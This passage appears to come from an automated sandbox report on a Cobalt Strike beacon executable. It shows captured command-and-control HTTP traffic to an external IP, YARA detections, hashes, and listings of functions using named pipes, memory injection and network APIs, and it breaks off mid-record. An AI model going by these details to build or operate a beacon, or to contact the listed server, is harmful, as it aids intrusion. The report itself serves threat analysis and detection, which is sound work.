Jan 10, 2025 09:28:57.919013023 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:57 GMT Server: nginx Content-Length: 128 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:28:57.919183016 CET	128	IN	Data Raw: 2f 6f 49 54 54 77 32 67 55 57 46 75 33 62 79 35 64 4c 71 39 57 51 38 38 6e 4e 43 62 4c 43 63 32 74 74 49 30 6d 4b 4c 36 30 6e 38 36 47 38 75 35 58 38 78 56 44 6c 57 4e 51 64 43 7a 54 62 50 71 59 73 4d 52 45 43 77 52 67 30 33 45 66 77 4d 45 6a 41 Data Ascii: /oITTw2gUWFu3by5dLq9WQ88nNCbLCc2ttI0mKL60n86G8u5X8xVDlWNQdCzTbPqYsMRECwRg03EfwMEjAnymCOD80jW3QtV85cmIwlrpXognPopdDdtcL06ibQqjbK7

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.6	50124	8.148.6.140	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:58.042006969 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:29:02.417078018 CET	337	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:29:01 GMT Server: nginx Content-Length: 152 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 62 58 65 42 76 4d 6a 6c 74 6f 4a 53 54 57 34 2b 78 59 50 4d 30 6b 47 46 75 47 65 37 32 43 50 6a 72 6c 4b 62 38 43 74 33 68 62 50 62 36 54 74 59 6b 63 38 39 31 46 59 6d 39 58 61 50 6b 6f 4d 32 51 61 6d 66 30 34 5a 2b 45 4a 61 36 74 37 4e 52 61 33 2f 4b 6a 53 37 72 39 6d 52 77 6e 6d 54 41 47 4b 67 47 56 77 2f 43 69 59 67 42 4e 74 79 70 78 46 41 38 52 4f 53 77 68 55 73 6a 79 48 2f 66 69 35 6b 6a 57 73 55 36 71 4e 52 43 79 79 31 38 4a 58 6d 49 77 41 3d 3d Data Ascii: bXeBvMjltoJSTW4+xYPM0kGFuGe72CPjrlKb8Ct3hbPb6TtYkc891FYm9XaPkoM2Qamf04Z+EJa6t7NRa3/KjS7r9mRwnmTAGKgGVw/CiYgBNtypxFA8ROSwhUsjyH/fi5kjWsU6qNRCyy18JXmIwA==
Jan 10, 2025 09:29:02.417567015 CET	337	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:29:01 GMT Server: nginx Content-Length: 152 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 62 58 65 42 76 4d 6a 6c 74 6f 4a 53 54 57 34 2b 78 59 50 4d 30 6b 47 46 75 47 65 37 32 43 50 6a 72 6c 4b 62 38 43 74 33 68 62 50 62 36 54 74 59 6b 63 38 39 31 46 59 6d 39 58 61 50 6b 6f 4d 32 51 61 6d 66 30 34 5a 2b 45 4a 61 36 74 37 4e 52 61 33 2f 4b 6a 53 37 72 39 6d 52 77 6e 6d 54 41 47 4b 67 47 56 77 2f 43 69 59 67 42 4e 74 79 70 78 46 41 38 52 4f 53 77 68 55 73 6a 79 48 2f 66 69 35 6b 6a 57 73 55 36 71 4e 52 43 79 79 31 38 4a 58 6d 49 77 41 3d 3d Data Ascii: bXeBvMjltoJSTW4+xYPM0kGFuGe72CPjrlKb8Ct3hbPb6TtYkc891FYm9XaPkoM2Qamf04Z+EJa6t7NRa3/KjS7r9mRwnmTAGKgGVw/CiYgBNtypxFA8ROSwhUsjyH/fi5kjWsU6qNRCyy18JXmIwA==

Target ID:	0
Start time:	03:24:53
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\beacon_x64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\beacon_x64.exe"
Imagebase:	0x400000
File size:	328'704 bytes
MD5 hash:	AF51E1DBA9C7DA4626AE4AAC6E61A070
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2114029429.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	7.2%
Total number of Nodes:	1000
Total number of Limit Nodes:	49

Executed Functions

Function 00401180 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 196
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 004011E6
SetUnhandledExceptionFilter.KERNEL32 ref: 00401258
malloc.MSVCRT ref: 00401322
strlen.MSVCRT ref: 00401345
malloc.MSVCRT ref: 00401351
memcpy.MSVCRT ref: 00401365
GetStartupInfoA.KERNEL32 ref: 00401463

Strings

@6E, xrefs: 0040125E
DCE, xrefs: 0040138E
0PE, xrefs: 00401490

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID: 0PE$@6E$DCE
API String ID: 649803965-2430247936
Opcode ID: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
Instruction ID: 7b6093c48930a8ef89593839c944e9f908a2e32032a5f35aeb8b435f34b377a6
Opcode Fuzzy Hash: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
Instruction Fuzzy Hash: 5C71ADB5601B0486EB259F56E89476A33A1B745BCAF84803BEF49673E6DF7CC844C348

Function 00401630 Relevance: 6.0, APIs: 4, Instructions: 50
pipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeA.KERNEL32 ref: 0040167C
ConnectNamedPipe.KERNEL32 ref: 00401699
WriteFile.KERNEL32 ref: 004016BC
CloseHandle.KERNEL32 ref: 004016C9

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: NamedPipe$CloseConnectCreateFileHandleWrite
String ID:
API String ID: 2239253087-0
Opcode ID: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
Instruction ID: 33ab9d0585ac1679f1025b945fed68b18b66da774309cd2c41c4043231b0423c
Opcode Fuzzy Hash: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
Instruction Fuzzy Hash: 431182A1714A5047E7208B12EC4870AB660B785BEAF548635EE5D1BBE4DB7DC445CB08

Function 00774E28 Relevance: 4.7, APIs: 3, Instructions: 190
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00774FEC: malloc.LIBCMT ref: 00775008

GetUserNameA.ADVAPI32(?,?,?,?,?,?,?,-00000001,?,-00000001,?,00000002,0076BC89), ref: 00774EAF
strrchr.LIBCMT ref: 00774EED
_snprintf.LIBCMT ref: 00774F9B

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: NameUser_snprintfmallocstrrchr
String ID:
API String ID: 1238167203-0
Opcode ID: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
Instruction ID: acfcf0b2408f82f1970ff836b1577b2b25feed8be8b1a88da89a17859e82d0fa
Opcode Fuzzy Hash: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
Instruction Fuzzy Hash: B6417030718A484FEB58BB6CA45A67972D2FBC9310B50852DE48FC3296DE78DC468786

Function 00CB0000 Relevance: 1.7, APIs: 1, Instructions: 211
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNELBASE ref: 00CB00D0

Memory Dump Source

Source File: 00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_beacon_x64.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 88e8bec169d31fc803aeef05fed04f98ffb8ac2501b92b4af572ff67ccb03544
Instruction ID: 9edfd09e993379db005e2cd451a7fa2ee2d74b5f3c2cf8424c25b948288ca37c
Opcode Fuzzy Hash: 88e8bec169d31fc803aeef05fed04f98ffb8ac2501b92b4af572ff67ccb03544
Instruction Fuzzy Hash: 62512330214A498F871DDE1C95C1A36B7D5FB95305B2596ADE5ABCB22BC930EC93CA80

Function 0077C3B8 Relevance: .1, Instructions: 122
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aac624e9975941b750356ceb78cd3aa232c6bd2fb96b7d29432793f1a6c54ced
Instruction ID: 7878f70bb30bb46caeed817ae11cf8f40daf5e55c535db903da7736341a572bd
Opcode Fuzzy Hash: aac624e9975941b750356ceb78cd3aa232c6bd2fb96b7d29432793f1a6c54ced
Instruction Fuzzy Hash: 8731693061CB498FDF59DF5CA8A56293BE5F7AC350B10416EE44EC3221CB78EC418B82

Function 0077C1C8 Relevance: .1, Instructions: 121COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aae31d7e320f49b2b7b8d2523f04f5552282cf255c9fc24f679e558ee007d563
Instruction ID: d2ba47a7aa6781d044900516d1f07da00c9b92082def92b798761cb42449b37d
Opcode Fuzzy Hash: aae31d7e320f49b2b7b8d2523f04f5552282cf255c9fc24f679e558ee007d563
Instruction Fuzzy Hash: 2731723071CB488F9F96DF9CA89562677E1F7AC340B10456EE44DC3221DB38EC418B86

Function 0077C2EC Relevance: .1, Instructions: 75COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33013136f0bb95f1eb9f3645b418df4a5ff2efb559231014e174e8ee2656166c
Instruction ID: 474e96df1a5244b6b548cbe0c62cad31774b50e3e60343505492e5b3e50b3809
Opcode Fuzzy Hash: 33013136f0bb95f1eb9f3645b418df4a5ff2efb559231014e174e8ee2656166c
Instruction Fuzzy Hash: 7B213D70609B488FDF56DB5CA45872977E5F79C355F10892EE44DC3260CB7C9984CB82

Function 004017F8 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 54
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 004017B9
SleepEx.KERNELBASE ref: 004017CD

Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784

GetTickCount.KERNEL32 ref: 004017FC
CreateThread.KERNEL32 ref: 00401885

Strings

%c%c%c%c%c%c%c%c%cMSSE-%d-server, xrefs: 0040185A
., xrefs: 00401841
e, xrefs: 00401819
p, xrefs: 00401821
\, xrefs: 00401839
\, xrefs: 00401811
p, xrefs: 00401831
i, xrefs: 00401829
@@, xrefs: 004017AE

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
API String ID: 3660650057-1020837823
Opcode ID: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
Instruction ID: b345380edbdca45ebb9784712c11a19872ab0759f856dd5cf37371eb7f92d9a3
Opcode Fuzzy Hash: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
Instruction Fuzzy Hash: 6A11DFB2214A80C7E714CF62FC4575ABBA0F3C478AF44412AEB091B7A8CB7CC545CB08

Function 0076D68C Relevance: 7.8, APIs: 5, Instructions: 260
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_snprintf.LIBCMT ref: 0076D725

Part of subcall function 0077E63C: _errno.LIBCMT ref: 0077E673
Part of subcall function 0077E63C: _invalid_parameter_noinfo.LIBCMT ref: 0077E67E

_snprintf.LIBCMT ref: 0076D7BD
InternetQueryDataAvailable.WININET ref: 0076D87A

Part of subcall function 00771D70: strchr.LIBCMT ref: 00771DD6
Part of subcall function 00771D70: _snprintf.LIBCMT ref: 00771E0C

Part of subcall function 00771C0C: strchr.LIBCMT ref: 00771C69
Part of subcall function 00771C0C: _snprintf.LIBCMT ref: 00771CB3

_snprintf.LIBCMT ref: 0076D7D4

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _snprintf$strchr$AvailableDataInternetQuery_errno_invalid_parameter_noinfo
String ID:
API String ID: 2459009813-0
Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
Instruction ID: 6d3bfec50e3685198216892558368aa4cab22b6b8de7b5a8f6f69eca99914827
Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
Instruction Fuzzy Hash: 4781B831B18B488FDB29EB28D88967AB3E5FB94311F10456EE88BC7151DF78DD018781

Function 0076E014 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketA.WS2_32 ref: 0076E042
WSAIoctl.WS2_32 ref: 0076E08F
closesocket.WS2_32 ref: 0076E0EE

Strings

_Cy, xrefs: 0076E0A1

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: IoctlSocketclosesocket
String ID: _Cy
API String ID: 3445158922-1085951347
Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
Instruction ID: 95bc0be9aa1f534fcc7b4e410fba2e1e74f9bd43cf88a8b9a2e1c0882bca5aea
Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
Instruction Fuzzy Hash: 3931873461CA488FDB64DF289888666B7E5FBA8355F21463EE88FC3251DB78C5428741

Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 004015BC
VirtualProtect.KERNEL32 ref: 004015F6
CreateThread.KERNEL32 ref: 0040161B

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: Virtual$AllocCreateProtectThread
String ID:
API String ID: 3039780055-0
Opcode ID: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
Instruction ID: 4860219b4c01c513d172ce07c02c5f666ef61a193e7305fd3c1758593cceafba
Opcode Fuzzy Hash: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
Instruction Fuzzy Hash: 83012B9231558051E7249B73AC04B9AAA91A38DBC9F48C135FE4B5FB65DA3CC145C308

Function 00787EE0 Relevance: 4.5, APIs: 3, Instructions: 46
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__initmbctable.LIBCMT ref: 00787EF8

Part of subcall function 00783DF0: _setmbcp.LIBCMT ref: 00783E02

GetModuleFileNameA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00780A4D), ref: 00787F16
parse_cmdline.LIBCMT ref: 00787F4E

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: FileModuleName__initmbctable_setmbcpparse_cmdline
String ID:
API String ID: 2500756167-0
Opcode ID: 02a3faf443033822baad9372f6b36ba85e02337a6089eab45ff8ead4e3f179b1
Instruction ID: 3ff3fa534ec8f9c9e373ba441b533fc88c6fd90fa152f1274ba915cb112eb96d
Opcode Fuzzy Hash: 02a3faf443033822baad9372f6b36ba85e02337a6089eab45ff8ead4e3f179b1
Instruction Fuzzy Hash: DA01D63060DB488FEB64EF6C9898326BBE1F799315F10075EE18AC21A0CB78C546C786

Function 00401704 Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 0040174D
ReadFile.KERNEL32 ref: 00401777
CloseHandle.KERNEL32 ref: 00401784

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
Instruction ID: 7b1d3a4e01a1f8e2f055cb9d21318694f184940eaf5a18d2a9f539c7fc6a8346
Opcode Fuzzy Hash: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
Instruction Fuzzy Hash: 2401D46531461186E7214B52AC04716B6A0B3D4BE9F648339BFA907BD4DB7DC54ACB08

Function 0076DA48 Relevance: 3.2, APIs: 2, Instructions: 159
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 0076DB0C
InternetConnectA.WININET ref: 0076DB7A

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: Internet$ConnectOpen
String ID:
API String ID: 2790792615-0
Opcode ID: c02896be98f17698b461471e8597e5ae08ffedd86d74317b17a8770a829ca45e
Instruction ID: 244b89fc3f3b9261a23c0d605b99ad7398eb0d6a0aad11de3600b9e504bda1e2
Opcode Fuzzy Hash: c02896be98f17698b461471e8597e5ae08ffedd86d74317b17a8770a829ca45e
Instruction Fuzzy Hash: 3D418F30728B048FEF59EB68D89A72973D6FB88304F11542DE48BC7252DA7C9D06C786

Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885

SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: Sleep$CountCreateThreadTickmalloc
String ID:
API String ID: 345437100-0
Opcode ID: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
Instruction ID: 6421346cc2233eacca5f16f640383cf641c739f700fbc6dff330eaabfecbeef7
Opcode Fuzzy Hash: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
Instruction Fuzzy Hash: EEC02B5430104440DB0833F3442733D06180B08388F0C043FFE0B322D28C3CC050030E

Non-executed Functions

Function 00781F9C Relevance: 30.8, APIs: 15, Strings: 2, Instructions: 1030COMMON

Download Yara Rule

APIs

Part of subcall function 00780600: _getptd.LIBCMT ref: 00780616
Part of subcall function 00780600: __updatetlocinfo.LIBCMT ref: 0078064B
Part of subcall function 00780600: __updatetmbcinfo.LIBCMT ref: 00780672

_errno.LIBCMT ref: 00782002

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

_fileno.LIBCMT ref: 0078202F

Part of subcall function 00784A54: _errno.LIBCMT ref: 00784A5D
Part of subcall function 00784A54: _invalid_parameter_noinfo.LIBCMT ref: 00784A68

write_multi_char.LIBCMT ref: 0078266B
write_string.LIBCMT ref: 00782688
write_multi_char.LIBCMT ref: 007826A5
write_string.LIBCMT ref: 00782704
write_multi_char.LIBCMT ref: 0078275D
free.LIBCMT ref: 00782771
_isleadbyte_l.LIBCMT ref: 00782842
write_char.LIBCMT ref: 00782858
write_char.LIBCMT ref: 00782879
_errno.LIBCMT ref: 0078297C
_invalid_parameter_noinfo.LIBCMT ref: 00782987

Strings

, xrefs: 0078263F
@, xrefs: 0078201B

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3613058218-1077428164
Opcode ID: 0599035506f01076b605f9026c3628a483f4ccd483033c44f83e2593a1d2db07
Instruction ID: 1f28cff204419ba93e173a46cdaceaa930e0a17647883796d27ec94040fd8af7
Opcode Fuzzy Hash: 0599035506f01076b605f9026c3628a483f4ccd483033c44f83e2593a1d2db07
Instruction Fuzzy Hash: 0952F531A98B498BDB2CBA58C855379B7E1FB95312F24422DD987C3593DA3CDC438782

Function 00781528 Relevance: 29.0, APIs: 15, Strings: 1, Instructions: 1022COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00780600: _getptd.LIBCMT ref: 00780616
Part of subcall function 00780600: __updatetlocinfo.LIBCMT ref: 0078064B
Part of subcall function 00780600: __updatetmbcinfo.LIBCMT ref: 00780672

_errno.LIBCMT ref: 0078158E

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

_fileno.LIBCMT ref: 007815BB

Part of subcall function 00784A54: _errno.LIBCMT ref: 00784A5D
Part of subcall function 00784A54: _invalid_parameter_noinfo.LIBCMT ref: 00784A68

write_multi_char.LIBCMT ref: 00781BEB
write_string.LIBCMT ref: 00781C08
write_multi_char.LIBCMT ref: 00781C25
write_string.LIBCMT ref: 00781C84
write_multi_char.LIBCMT ref: 00781CDD
free.LIBCMT ref: 00781CF1
_isleadbyte_l.LIBCMT ref: 00781DC2
write_char.LIBCMT ref: 00781DD8
write_char.LIBCMT ref: 00781DF9
_errno.LIBCMT ref: 00781EF3
_invalid_parameter_noinfo.LIBCMT ref: 00781EFE

Strings

, xrefs: 00781BBF

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

